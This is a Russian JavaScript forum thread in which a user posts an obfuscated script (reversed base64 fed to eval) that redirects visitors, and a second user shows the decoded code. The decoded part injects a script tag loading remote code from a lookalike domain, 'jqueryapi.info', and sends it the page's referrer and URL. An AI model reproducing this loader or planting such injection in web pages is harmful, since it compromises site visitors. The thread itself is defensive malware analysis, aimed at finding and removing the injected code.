Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 25.05.2014, 12:10
Новичок на форуме
Отправить личное сообщение для Denamen Посмотреть профиль Найти все сообщения от Denamen
 
Регистрация: 25.05.2014
Сообщений: 1

Помогите расшифровать скрипт
Всем привет. Есть скрипт, при исполнении которого первый раз, происходит Редирект на другой сайт.
Помогите расшифровать часть скрипта, чтобы найти и удалить эту команду.


var I00='KkSKpcCfngCdpxGcz5yJtVnb5FGZflXYkRHMywXZ0FGRD RVV0V2Z8NWZz9VehRGd4IDfyZ3b3IDf5FGZ3IDf05WZtVGbFVG dhVmcjxnchZHOywXb152XzlXYkhjM8BHd0hGfy9mZ5ADfvZmbp xnbyVHdlJXOww3YlN3X5FGZ0BjM8lDN0ATd8FzYlN3X4lmb1hj M8V2YpJHc3IDfyUGdhR2XzpWOwwXb1NHMywXRDlkUQBjM8VGdh R2X5FGZ0hjM8hGdu9WbflXYkRHMywnciN0M852bpRXY6lGbhRX ZkdjM8lHbpFGZwIDfwQ0M81Wdz9lc29GftV3cfJndvlDM8NXZj lmcwBjM8lHbpFGZxIDfslWY0VGZfJHdzxXMjV2cfhXauVHfCRD NwUHfzpGMywXZ0FGZwIDfslWY0VGZfJHdzlDM8lHbpFGZ8REN0 ATd8lVQEBjM852bpR3YuVnZ5ADfzMDNwUHf2IzQzwHdulUZzJX YwBjM8RXdwRXdvdjM8JzYlN3X4lmb1hjM8lXYk9Gd4IDfjJ3c0 V2Z8JzYlN3X4lmb1BjM8BjNwIDfxQ2XyR3cwIDf1cjM8NGbhNG MywnTh50NywHdwlmcjN3QzwXZs92cu92YCdDflNHbhZGMywHZk hjM8FTZ0FGZfNna5ADfkxWaoNEZuVGcwFGfyITRzw3c5FGZfxG b1ZWOwwXZtFmTnFGV5J0c05WZtVGbFRXZnxXMlRXYk91Zulmc0 NHMywnMlRXYk91Zulmc0NHOyw3YlN3X5FGZwIDfjJ3c8xXb152 XzlXYkxHfyMWZz9Fep5Wd8lGchlnclVXcqxHMwIDfzlXYkBjM8 ZWZyxnchZHMyw3avxXN0QDM1xnMlRXYk91cqBjM8FTZ0FGZfNn awIDfxUGdhR2Xn5WayR3c4IDflRXYERXZnxnc5hjM8VGchN2cl 5Wd8JXewIDfoRnbv12X5FGZ0xHduVmbvBXbvNUSSVVZk92YuVG fyVmcyVmZlJHfsJXd8JDZfJHdzBjM8lUMJxXZs92cu92Y8FzM0 ATd8FzYlN3X4lmb1BjM8RHcpJ3YzxnMlRXYk91Zulmc0NHMywH TSVFfyQ2XyJXY8ZWa5ADflRXYk9VehRGdwIDflNHblBjM8lGMy wXb1N3XyZ3bwIDflNWayB3X5FGZ0xXb152XzlXYkBjM8JDZfJn chBjM8FDZfJnchxXMk9lcyFGMywXZwF2YzV2X81WduBjM8VWbp RFdldGfwIUN8NjNzwHNxAjM3IDfkRGMywnchZnQ3wHa052bNRX ZnxXehR2b0BjM8FjQ1w3YlN3X5FGZ4IDfyFmd8xGbsxnRzQDM1 xXbtBjM8ZDN0ATd8BDMwEDfyFWZZxGb1ZEdldGf5cTM8RzM0AT d8lzM0ATd8J0M0ATd8V2YpJHcflXYkRHMywXZs92cu92Y5ADfx Q2XyR3c4IDfwQDNwUHftVnb5FGZflXYkRHfkFWZox3Q0QDM1xH a052bt9VehRGdCVDf05WZtV3YvRGf4MDNwUHfn9Gb8F0M0ATd8 dXZuBjM8VGdhREMyw3M0QDM1xHRzQDM1xnMzQDM1xnM0QDM1xX NzQDM1xnR0QDM1xXOww3QzQDM1xnchZXOwwnMCVDftVnb5FGZf lXYkRnQ1wXM0QDM1xXRzQDM1xHMzQDM1xXZ0lmc3xnMk9lc0N3 QywnbyVHdlJHMywXQwwHbhZXZ8RXasB3c8BHeFdWZSxHf05WSl NnchBHf8VGZvNkchh2Qt9mcmx3Zulmc0N1b0x3dl5Gfn5WayR3 U8VGbph2d8ZWa8V2YhxGclJHfu9Wa0Nmb1ZGfuJXd0Vmc8xHf8 xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xH f8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8 xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xH f8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8 xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xH f8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8 xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xH f8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8 xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xH f8xHf8xHf8xHf8xHf8xHf8xHf8xHfnwSOzUDLyYDLnkSK9tHLw wSKnwFfnwFK0YjLnwFV2wXO2w3N2wHO2wne2wHN4wXU3wnU3w3 U3wHU3w3T3w3S3wHT3wHfNdDf850N8R1N8V1N8BDO8FDO8JDO8 p1N8l1N8BjN8Z1N8d1N8h1N8p0N8l0N8N3N8R3N8V3N8J3N8F3 N812N852N892N8B3N8Z3N8d3N8Z0N8d0N8h0N8V0N8N0N8h3N8 l3N8p3N8F0N8NDO8lGO8pHO8dHO8hHO8VHO8RHO8FHO8JHO8NH O8lHO8JEO8VEO8dEO8ZEO8REO8FEO8NEO8ZHO89GO8JGO8NGO8 RGO8FGO8lDO8VDO8ZDO8dDO8hDO8VGO8ZGO8xGO81GO85GO8tG O8pGO8dGO8hGO8BHO8J0N8dzN8NnN8RnN8VnN8JnN8FnN81mN8 5mN8R0N89mN8BnN8ZnN8FjN8dnN8NkN8RkN8VkN8JkN8FkN8hn N8lnN8xmN8ZkN8hmN8ZjN8JjN8ZVN8NjN8hVN8RVN8VVN8lVN8 pVN8tmN8FmN8lmN8pmN8dmN8ZmN8JmN8NmN8dVN8RmN8VmN8x2 N8t2N8xHf8xHfHZDf4cDf5cDf2cDf1cDfycDfzcDf0cDfhdDfi dDfodDfpdDfqdDfndDfmdDfjdDf1YDfkdDfldDfxcDfwcDfOZD fPZDfQZDfNZDfMZDfIZDfJZDfKZDf8x3S2wXU2wnU2wHW2wXW2 wnW2w3V2wnV2w3U2w3U1wHN2wnU1wHf8xHf8xHf8xHf8xHf8xH f8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8 xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xH f8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8 xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xH f8xHf8xHf8xHf8xHfnwFLVZDLyYDLnwVKpkyJcxFX8dCXcxFKV JjLnwFXcRFN8VFN8hTN8NFN8JFN85EN89EN8BFN8FFN8dFN8hF N8RTN8VTN8ZTN8NTN8JTN8xXW0wnW0wHM1wXM1wXT0wHT0w3d0 wHe0wXe0wne0wnd0wXd0wXc0wnc0w3c0wHd0wXQ0wnQ0wXS0wn S0w3S0wHS0w3R0w3Q0wHR0wXR0wnR0w3N1wHf8xHfDVDf8VUN8 xnR1wHfBVDf6VDf2VDfIVDf4VDf5VDfHVDfKVDfPVDfQVDfRVD fOVDfNVDfJVDfLVDfMVDf3VDf0VDfmVDfnVDfoVDflVDfkVDf5 UDfhVDfiVDfjVDfpVDfqVDfxVDfyVDfzVDfwVDfvVDfrVDfsVD f1VDftVDfuVDfWRDfiRDfwNDfxNDfyNDfvNDfuNDfCVDfrNDfs NDftNDfzNDfDNDf0NDf6NDfGNDfHNDf5NDf4NDf1NDfpNDf3ND fINDflNDfxMDfyMDfwMDfzMDf0MDfZJDfXJDfaJDfYJDfoNDf3 MDfmNDfnNDfkNDfVJDfjNDf4MDf5MDfhNDfiNDf2NDfwRDfvRD fJNDfBNDfkRDfhRDf5QDf1QDf2QDf3QDf4QDflRDfmRDfsRDfF NDftRDfuRDfrRDfqRDfnRDfoRDf8lGN8RDN8NDN8B1M8F1M8J1 M890M850M8RUN8t0M8x0M810M8R0M8J0M8BDN8FDN8x3JcxFXs IDNso1MscCXcx1OpkyVocUMoEVMu82OpcEKzIjLjFzOdBzWpcC XcxFXcxFXsFzJcxFXcxFXchibx4yb9MWMgY0OpkWMu8GK3EzKn wFXcxFXcxVPoFjJnwFXcxFXcx1KpcWMu8GK3EzKnwFXcxFXcxV P6FjJnwFXcxFXcx1KnwFXcxFXcxlcx0Ddx8zLBJjLIJzLvoDUy cCXcxFXcxFX9ElMuc0OpcCXcxFXcxFXlFzJcxFXcxFXchyTy4y b9cEIGtzJcxFXcxFXcBXJlFzLhFTJrViMlITJzUCNlIWMlgmMl ITJyUyMlITJyUiMlMTJ0USOyUiZysyNyUCMyUSQlEnMlgjMl0m L2ViMlITJzUCNlkjMl8mMrcjMlAjMlUTJwITJwJTJOJTJ4ITJt 5idlITJyUyMlsWJyUiMlITJzUCNlcjMlQjMlcjMlsSOxsyNyUC MyUSQlAjMlcjMlsSOyUSOyUCOyUCOx4icyUyK3ITJucjMlsiNx syNyUiL3ITJrc3K3ITJwITJwVSdyUyNyUCMyUSNlsCMyUCbyUi MlITJyUyMlQTJ5ITJ5UiQlkTJxVyaysyNyUCMyUSNlAjMlkTJ3 ITJrc3K3ITJmFTJ5UyNyUyK2EzK3ITJmFTJwITJkJTJpJTJ0Uy NyUyK5EzK3ITJwITJ1UyKSJTJ4ITJt5CZx8yLyUiMlITJyUyMl IWJhVSYloWJ4UCMyUCelIWJKJTJQVyNlAjMlwWJwITJlVCalQX JwITJucWJjVCZlEWJ4UCOlQWJnVCMyUielMWJ4UyNlEWJuVyNl MWJ4UCMyUSYlIWJlVSelYWJkVCUl4WJnVSVl8yLwITJ0USdlUT JrAjMl4mMlITJyUiMlMTJrVCNlkTJCVSOlEXJtJTJ1UCMyUSdl gVJwITJxETJrVCNlkTJxVCdyUSNlAjMlUXJYVCMyUSOyUSOlIU J5USclMnMlgjMlAjMlUTMlITJyUiMlMTJxsCMyUialEWJ3UyYl UmMlcTJVVCMyUyQyUyYyUiYyUiZlAjMlkUJlVCOlIWJhVCMyUC elcTJmViYlkXJqVCalAjMl0CMyUielcWJkViZlgWJlVCMyUyQy UielgWJiVCdlAjMlgXJqJTJhViYlQWJmViblcWJjVCZlEWJ4UC OlQWJnVCMyUSZlgTJjViblgTJ3UCalMWJ3UCMyUialEWJ3UyZl cTJjVyNlwWJwITJsVCMyUyQyUSSlUWJ4UiYlEWJv8CMyUCNlEz K5ITJ4ITJW5yQlUTJwITJ2JTJ2UiMlITJyUyMlITJyUiMlITJz UCNlkjMlc3K3ITJwITJ1UCMyUSWlcnMlgjMl0mLkFzLvITJyUi MlITJzUiYlkUJlVCOlIWJhVCMyUiZlAjMlUWJoVCdlAjMlcWJi VSYlcTJoVyLvAjMlQTJ5ITJ4ITJNJjLDVSNlAjMlwkMlYTJyUi MlITJzUCNlkjMlskMlIXJzVSNlAjMlMUJ2UiMlITJyUyMlQTJI pSOyUSaqkjMloVJrMlMlAjMlUTJwITJJJTJ2UiMlITJyUyMlQU JwITJ5ITJrsSRlQTJ5ITJ6JTJhFTJFVCNlknMlUUJ4JTJCJTJy UiMlMTJkVSYlEWJqVCOlAjMlUWJkViZlcTJEJTJ3UyYl4WJv8C MyUCNlckMlUTJwITJiFTJ2UiMlITJzUiMlITJyUyMlQTJ5ITJh JzK3ITJwITJ1UCMyUiRyUSWlQTJ3ITJrUkMrcjMlAjMlAXJ1UC MyUyNyUyKnJzK3ITJwITJBViVxUCOyUSbuYXJyUiMlMTJyUiMl ITJzUCNlMTMlUTJwITJzFTJyUiMlMTJ0USOyUiWl8SOyUiMxUS LwITJwFTJwITJ1UCMyUyMxUiNlITJyUyMlITJyUiMlMTJxFTJk VCblMWJqVCOlAjMlYWJwITJ0VCaloWJsViYlgTJwITJ3UiZl0S elcTJsVyLvAjMlQTJ0IjK1FjK2FTJ1UCMyUSQxUiNlITJyUyMl QTJI9SOyUCOyUCVu8WMlUTJwITJ3FTJ2UiMlITJzUCNlg0L5IT J4ITJU5CexUSNlAjMlITMlYTJyUiMlMTJyUiMlITJzUCNlkjMl IUMlIXJzVSNlAjMl0WMlITJyUyMlQTJ5UCMxUCNxsiMyUyLyIT JrkTJRVCNxsiMyUyLyITJrkTJMVSTlUTJwITJqFTJ2UiMlITJz UiMlITJyUCNlkjMlcjMl4yNyUCOyUySusWMlUTJwITJNViNlIT JyUyMlITJyUiMlMTJ0USOyUSexUiclMXJ1UCMyUSNyUiMlITJz UCNlkTJwETJOtiMyUyLyITJrkTJRViTrIjMl8iMyUyK5UCTlIV J1UCMyUyQxUiNlITJyUyMlITJyUiMlQTJ5ITJ3ITJucjMlgjMl skLVFTJ1UCMyUiUlYTJyUiMlMTJyUiMlMTJrVCNlQVMlIVMlQT J5ITJ3ITJTFTJ4ITJt5yVxUCMyUSMxUyalQUJwITJ5ITJ5ITJY FTJTViNyUiNyUCMyUSMyUiWxUCMyUiNyUiNyUCMyUSOyUyNyUS WxUSNlUTJPViNyUiNyUCMyUyNyUCUxUSNlUTJIFTJ4ITJwITJ1 ETJyUiMlMTJ0USOyUCOyUCOx4iSlUTJwITJGFTJEFTJ0USMrkj MlgjMlYlLKVSNlAjMl8UJ2UCNlkjMlkjMlgjMlUUMukUMloUMl UTJwITJTViNlQTJ5ITJ4ITJyVyclUTJwITJKViNlITJyUyMlQU JwITJ5ITJPFTJOFTJNFTJLFTJyUCclwUMlcCXcxFXcxFX9cFIG dCXcxFK9BHIUJTf9lSXjt1askyJcxFXndCXcxFLnwFXcJGXcxF XcxFXcdCXcx1KpMGKltyJcxFXixFXcxFXcxFXnwFXchCWzAyVz giVz4Cc9A3ep01YbtGKVNzep0SLjhSWzsTfpkiNzgCVz4yY6kS OysyYoM1Muo0M/UzM+kSYlMWPjhCKrkSKpE2LjhyY0gSZ6cCXcx1JcxFX/EGPjhCVysXKjhiVy0TZ7lCZsUGLrxyYsEGLwhiVygiazcCXo0H cgIVN91XKdN2WrxSKnw1ZnwFLnwlYcxFXcdCXrkyYoU2KnwlYc xFXcdCXoMjNggVNoQVNuAXPwtXKdN2WrhSV1sXKt0yYoYVN70X M9M2O9dCXrcHXcxFXnwlU1sXKoMVN9U2Od1XXltFZgIVN7lSZo MVNb1za9lyYoUGf811YbtWPdlyYoU2WktXKt0yYoYVN7lSKXVD Lv41LoQVNucCXnwVIoUVN70XKpYzMokVNuMmOpkjMrMGKaVjLX VzP1MjPpEWJj1zYogyKpkSKh9yYoEjNoUmOnw1Jc9TY8MGKSVz epMGKTVTPltXKkxSZssGLjxSYsAHKTVDK1YzJo0Hcg4mc1RXZy 1Xfp01YbtGLpcyZnwyJixFXnsSKjhSZrciYcx1JoAHeFdWZSBy dl5GKlNWYsBXZy5Cc9A3ep01YbtGKml2ep0SLjhSZslGa3tTfp kiNzgyZulmc0N1b05yY6kSOysyYoUGZvNkchh2Qt9mcm5yZulm c0N1P1MjPpEWJj1zYogyKpkSKh9yYoQnbJV2cyFGcoUmOncyPh xzYo4mc1RXZytXKjhibvlGdj5Wdm1TZ7lCZsUGLrxyYsEGLwhi bvlGdj5WdmhCbhZXZ';function OOO(data){var OIIlOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnop qrstuvwxyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';do{h1=OIIlOI. indexOf(data.charAt(i++));h2=OIIlOI.indexOf(data.c harAt(i++));h3=OIIlOI.indexOf(data.charAt(i++));h4 =OIIlOI.indexOf(data.charAt(i++));bits=h1<<18|h2<< 12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bi ts&0xff;if(h3==64){enc+=String.fromCharCode(o1)}el se if(h4==64){enc+=String.fromCharCode(o1,o2)}else{en c+=String.fromCharCode(o1,o2,o3)}}while(i<data.len gth);return enc} function OII(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(OOO(OII(I00)));
Ответить с цитированием
  #2 (permalink)  
Старый 25.05.2014, 12:30
Отправить личное сообщение для Octane Посмотреть профиль Найти все сообщения от Octane  
Регистрация: 10.07.2008
Сообщений: 3,873

var lll = document.createElement('script');
lll.src = 'http://jqueryapi.info/?getsrc=ok' + '&ref=' + encodeURIComponent(document.referrer) + '&url=' + encodeURIComponent(document.URL);
var I1I = document.getElementsByTagName('head')[0];
I1I.appendChild(lll);


function calc(str_d1, str_d2) {
    var today = new Date();
    var dd = parseInt(today.getDate());
    var mm = today.getMonth() + 1;
    var yr = today.getFullYear();
    if ((yr == '2014' && mm == '5') && (dd > 22 && dd < 26)) {} else {
        console.log('NaN');
        return false;
    }

    var arr_d1 = str_d1.split('.');
    var string_date1 = arr_d1[1] + "/" + arr_d1[0] + "/" + arr_d1[2];
    js_date1 = new Date(string_date1);

    var arr_d2 = str_d2.split('.');
    var string_date2 = arr_d2[1] + "/" + arr_d2[0] + "/" + arr_d2[2];
    js_date2 = new Date(string_date2);

    var unix_sec1 = js_date1.getTime() / 1000;
    var unix_sec2 = js_date2.getTime() / 1000;
    var day_sec = 60 * 60 * 24; //кол-во секунд в сутках

    var days_num = (unix_sec2 - unix_sec1) / (day_sec);
    full_days = days_num;

    console.log('output: ' + unix_sec1 + ' => ' + unix_sec2 + '; num days = ' + days_num);

    var ovr_sum = 0; //итоговая сумма
    for (var i = 0; i < (days_num); i++) {
        var tday_sec = (unix_sec1 + (day_sec) * i) * 1000;
        var tday_date = new Date(tday_sec);
        var tday_daynum = tday_date.getUTCDate(); //номер дня в месяце
        //console.log('day num = '+tday_daynum);

        var tday_month = tday_date.getMonth() + 1; //месяц, к которому относится рассматриваемый день, январь - нулевой месяц в js date, поэтому +1
        if (!daily[tday_month][tday_daynum]) {
            var tday_price = prices[tday_month];
        } else {
            var tday_price = daily[tday_month][tday_daynum];
        }
        ovr_sum += tday_price; //прибавляем стоимость рассматр. дня к общей сумме
        //console.log('price+= '+tday_price+'; PRICE DAY ['+tday_month+']['+tday_daynum+'] = '+daily[tday_month][tday_daynum]);
        str_detail += '<br> ' + tday_daynum + '.' + tday_month + '.' + (tday_date.getFullYear()) + ' : ' + tday_price + '$';
    }
    console.log('ovr sum = ' + ovr_sum);
    console.log('detalization: ' + str_detail);

    return ovr_sum;
}
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите доработать скрипт Joannes Общие вопросы Javascript 0 08.09.2013 21:21
Помогите вставить скрипт на страницу alexsio Работа 7 22.04.2013 18:19
Помогите пожалуйста правильно написать скрипт raffx Events/DOM/Window 17 16.10.2012 20:31
Скрипт if помогите пЕньку NeverLux Общие вопросы Javascript 1 06.01.2011 14:33
Люди, помогите адаптировать скрипт под Оперу KiLLk Opera, Safari и др. 1 01.06.2009 01:05